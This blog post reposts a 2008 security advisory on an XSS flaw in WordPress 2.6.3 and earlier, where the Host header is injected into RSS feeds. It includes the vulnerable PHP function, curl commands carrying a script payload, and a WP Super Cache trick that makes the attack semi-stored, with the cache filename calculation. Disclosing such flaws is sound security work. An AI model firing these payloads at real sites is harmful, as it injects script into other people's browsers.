WordPress <= 2.6.3 XSS Vulnerability

Due to what we consider a critical and an exploitable vulnerability in the RSS subsystem in WordPress 2.6.3 and below, WordPress has released a fix, and moved to version 2.6.5. The links to the new version and other information are available after the jump, along with the Full Disclosure Vulnerability announcement from Jeremias Reith.

===== noXSS.org Security Advisory ======
Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <redacted>
Published: 2008/11/25
Affected: WordPress < 2.6.5
Summary
=======

WordPress prior to v2.6.5 fails to sanitize the Host header variable correctly when generating RSS feeds and is therefore prune to XSS attacks.

Web Sites running in a name based virtual hosting setup are not affected as long as they are not the default virtual host.

Moreover we only found installations running on the Apache web server to be affected.

Vulnerability Details
=====================

The function self_link() in wp-includes/feed.php is used to generate absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:

function self_link() {
echo ‘http’
. ( $_SERVER[‘https’] == ‘on’ ? ’s’ : ” ) . ‘://’
. $_SERVER[‘HTTP_HOST’]
. wp_specialchars(stripslashes($

_SERVER[‘REQUEST_URI’]), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but WordPress replaces all $_SERVER variables with escaped ones in wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);
In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified array. Unfortunately this escaping method is not safe in markup context.
PoC
====

The Apache web server only disallows ‘/’, ‘\’ and ‘..’ within the host header. The header can therefore contain markup making the following PoC possible:

curl -H “Host: \”> <body onload=alert(String.fromCharCode(88,83,83))>” \
http://www.example.org/blog/feed

The given example request will return (without additional newlines):

– snip –

<atom:link href=”http://\”>

<body onload=alert(String.fromCharCode(88,83,83))>

/blog/feed” rel=”self” type=”application/rss+xml” />

– snip –

The embedded JavaScript will be executed in Firefox 3.0.4 due to the triggered switch to Quirks mode.

Exploit

=======

The following exploit is a semi-stored XSS attack and has been tested with the following setup:

– Apache 2.x with IP based virtual hosting

– WordPress 2.6.3 installed in /blog/

– WP Super Cache 0.84

– Firefox 3.0.4

WP Super Cache is a popular WordPress plugin that adds static filecaching to WordPress. It greatly increases performance and is often used. It saves generated pages in the wp-content/cache directory and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation will lead to a file containing the XSS to be generated and placed within the document root.

Request:

curl -H “Host: \”><body onload=alert(String.fromCharCode(88,83,83))>” \

http://www.example.org/blog/feed

Generated file:

http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even tough the feed is

XML because the file is served as text/html.

The only missing the step is the calculation cached file’s MD5 sum.

The following code generates the MD5 checksum:

php -r ‘echo md5(”\”><body onload=alert(String.fromCharCode(88,83,83))>”.

“/blog/feed”), “\n”;’

In the default setup the MD5 sum can be generated by concatenating the

contents of HTTP_HOST and REQUEST_URI resulting in

0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes

it. The default expire time is 3600 seconds.

Vendor Response

===============

2008-11-17 Reported to vendor

2008-11-17 Initial response from vendor

2008-11-25 Release of version 2.6.5

This entry was posted in Wordpress. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *